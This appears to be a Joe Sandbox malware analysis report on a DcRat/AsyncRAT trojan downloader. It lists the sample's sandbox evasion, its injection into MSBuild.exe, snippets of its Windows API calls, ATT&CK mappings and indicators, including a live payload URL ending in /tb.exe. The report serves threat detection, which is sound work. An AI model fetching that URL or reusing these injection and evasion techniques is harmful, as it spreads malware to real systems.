          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe PID: 3928, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4D20000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8884Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 969Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe TID: 1688Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe TID: 1552Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7044Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1552Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2720Thread sleep count: 8884 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2720Thread sleep count: 969 > 30Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1177110987.00000000055D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
          Source: MSBuild.exe, 00000004.00000002.2387305116.0000000001083000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp:K
          Source: MSBuild.exe, 00000004.00000002.2393956128.00000000054A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code references suspicious native API functions
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, SendToMemory.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, SendToMemory.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, SendToMemory.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, SendToMemory.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, SendToMemory.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
          Compiles code for process injection (via .Net compiler)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeFile written: C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.0.csJump to dropped file
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 57C000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 57E000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C8D008Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8956.tmp" "c:\Users\user\AppData\Local\Temp\5dljncsi\CSC46F1B711EF3E491E90EFFC96C5EAD74.TMP"Jump to behavior
          Source: MSBuild.exe, 00000004.00000002.2388462794.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: MSBuild.exe, 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
          Source: MSBuild.exe, 00000004.00000002.2388462794.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002D87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
          Source: MSBuild.exe, 00000004.00000002.2388462794.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000003045000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected DcRat
          Source: Yara matchFile source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5036, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected DcRat
          Source: Yara matchFile source: 00000004.00000002.2388462794.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5036, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		412
          Process Injection          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Screen Capture          		12
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive11
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets13
          System Information Discovery          		SSHKeylogging13
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Timestomp          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe32%VirustotalBrowse
          SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe36%ReversingLabsWin32.Trojan.Mardom
          SAMPLE100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dll100%AviraTR/Dropper.Gen7

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://77.223.118F0%Avira URL Cloudsafe
          http://77.223.119.850%Avira URL Cloudsafe
          http://77.223.119.85/tb.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.210.172
          		truefalse
            		high
            pki-goog.l.google.com
            		64.233.185.94
            		truefalse
              		high
              c.pki.goog
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://c.pki.goog/r/gsr1.crlfalse
                  		high
                  http://c.pki.goog/r/r4.crlfalse
                    		high
                    http://77.223.119.85/tb.exetrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://77.223.119.85SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.000000000326F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://77.223.118FSecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.000000000326F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.0000000003231000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      77.223.119.85
                      		unknownRussian Federation
                      		51604EKAT-ASRUtrue

                      General Information

                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1663865
                      Start date and time:2025-04-12 19:34:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 4s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winEXE@8/9@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 23
                      • Number of non-executed functions: 3
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.76.34.6, 104.94.127.7, 172.202.163.200, 13.85.23.206, 20.12.23.50, 20.3.187.198, 4.245.163.56
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      13:35:17API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe modified
                      13:35:20API Interceptor2x Sleep call for process: MSBuild.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      77.223.119.85GSRuGK48Ex.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 77.223.119.85/tb.exe
                      rxm.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 77.223.119.85/tb.exe
                      fHVxtGnuGj.ps1Get hashmaliciousUnknownBrowse
                      • 77.223.119.85/cmd.bat
                      FShgmBmoSU.ps1Get hashmaliciousUnknownBrowse
                      • 77.223.119.85/wpl.exe

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      pki-goog.l.google.com2zb8yjqduP.dllGet hashmaliciousUnknownBrowse
                      • 74.125.21.94
                      GSRuGK48Ex.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 142.250.9.94
                      rxm.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 142.251.15.94
                      Rd_client_w_a_s_d_patched.exeGet hashmaliciousLummaC StealerBrowse
                      • 74.125.21.94
                      67f525209658e.vbsGet hashmaliciousLummaC StealerBrowse
                      • 108.177.122.94
                      IMSoftware{Launcher}3.21.exeGet hashmaliciousLummaC StealerBrowse
                      • 142.251.15.94
                      SoftWare(2).exeGet hashmaliciousLummaC StealerBrowse
                      • 74.125.21.94
                      SoftWare(1).exeGet hashmaliciousLummaC StealerBrowse
                      • 74.125.21.94
                      Launcher.exeGet hashmaliciousLummaC StealerBrowse
                      • 173.194.219.94
                      launch3r-v2.2.2.exeGet hashmaliciousLummaC StealerBrowse
                      • 142.250.9.94
                      bg.microsoft.map.fastly.netsupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.210.172
                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.210.172
                      jre-8u441-windows-x64.exeGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      jre-8u441-windows-x64.exeGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      AxgHj313r7.exeGet hashmaliciousRhysida, TrojanRansomBrowse
                      • 199.232.210.172
                      Dd73LmElYt.pptGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      Dd73LmElYt.pptGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      GSRuGK48Ex.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 199.232.210.172
                      rxm.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 199.232.210.172
                      tb.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 199.232.214.172

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      EKAT-ASRUGSRuGK48Ex.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 77.223.119.85
                      rxm.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 77.223.119.85
                      tb.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                      • 77.223.119.85
                      fHVxtGnuGj.ps1Get hashmaliciousUnknownBrowse
                      • 77.223.119.85
                      FShgmBmoSU.ps1Get hashmaliciousUnknownBrowse
                      • 77.223.119.85
                      xd.sh4.elfGet hashmaliciousMiraiBrowse
                      • 5.167.247.165
                      https://aoocezieaoocezie.myfreshworks.com/invite/dc31162a-1c0b-4de0-9bee-658f89e887a0Get hashmaliciousHTMLPhisherBrowse
                      • 77.223.124.18
                      Nyx4r.mpsl.elfGet hashmaliciousOkiruBrowse
                      • 5.166.58.47
                      spc.elfGet hashmaliciousMiraiBrowse
                      • 5.166.34.33
                      nabarm5.elfGet hashmaliciousUnknownBrowse
                      • 109.195.98.202

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      28a2c9bd18a11de089ef85a160da29e4RE_0078234567965441.pdf.wsfGet hashmaliciousKoadicBrowse
                      • 204.79.197.222
                      http://goodformen.coGet hashmaliciousUnknownBrowse
                      • 204.79.197.222
                      IMSoftware{Launcher}3.21.exeGet hashmaliciousLummaC StealerBrowse
                      • 204.79.197.222
                      https://www.canva.com/design/DAGkPkwDgSg/u9VDlBP5gFpCWakWq8SpPQ/view?utm_content=DAGkPkwDgSg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hc42c7e8522Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                      • 204.79.197.222
                      SecuriteInfo.com.Win32.MalwareX-gen.29703.7480.exeGet hashmaliciousUnknownBrowse
                      • 204.79.197.222
                      SecuriteInfo.com.Win32.MalwareX-gen.26952.14499.exeGet hashmaliciousUnknownBrowse
                      • 204.79.197.222
                      Aspen Landscaping Project.pdf.svgGet hashmaliciousHTMLPhisherBrowse
                      • 204.79.197.222
                      http://url7554.impulseup.com/ls/click?upn=u001.9-2FTADgI74e2OWE2P3fvtm3ks0lxIlIFyP5IwbLoDgBuxxxaTOIUzJMW49-2B9jqW6yELBC1ZQRMe6TWLgjPYTu0LiDQ0w3txTcOK6-2FV2ifPZbRaLIwmmOQ1GMQC9dU6RWb2aeLLtDeODHngY3VjjXvJO6oKDlYY-2FrsIGLii2s3kEKAZFDtf-2BL31aMPuCVwlwPCr7PEQRptcwz1QBhdaSd2LGMdK1VJSRTe40dM32Z7Jz2jBBbK0UwZYo0lLPRxihoyt5eczvkRV2tuefWun26R7i639CvHIPVt6rH7EVtY4Yq4-2BX81bSKNRYMont-2BURzxOXvIrvc-2FmXDxBQFquNv8hCg-3D-3DyDrr_naDZr6e6Tex7WwaKSXKSqq5INCcbCIdoxaaj2wbq7gjxBRbem7BEPIfWnVuAg3Bx1Fhri61H6wFbqCRaRuLXkT18hZCnXSGoRllL0C7rOtB91UeOJXduRfzcRPgDbBSd4X3uGtLfJirZl0ROKoAxqfXL7L4ToaeE6JzoQeI9uGX5kpoV7VcnaOLTWFbow5cQRwEdNeJ6VY-2B-2FtfbcKyooiw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                      • 204.79.197.222
                      https://review-bid-proposal-invitation-6987b4.webflow.io/Get hashmaliciousUnknownBrowse
                      • 204.79.197.222
                      http://tvstream.liveGet hashmaliciousUnknownBrowse
                      • 204.79.197.222

                      Dropped Files

                      No context

                      Created / dropped Files

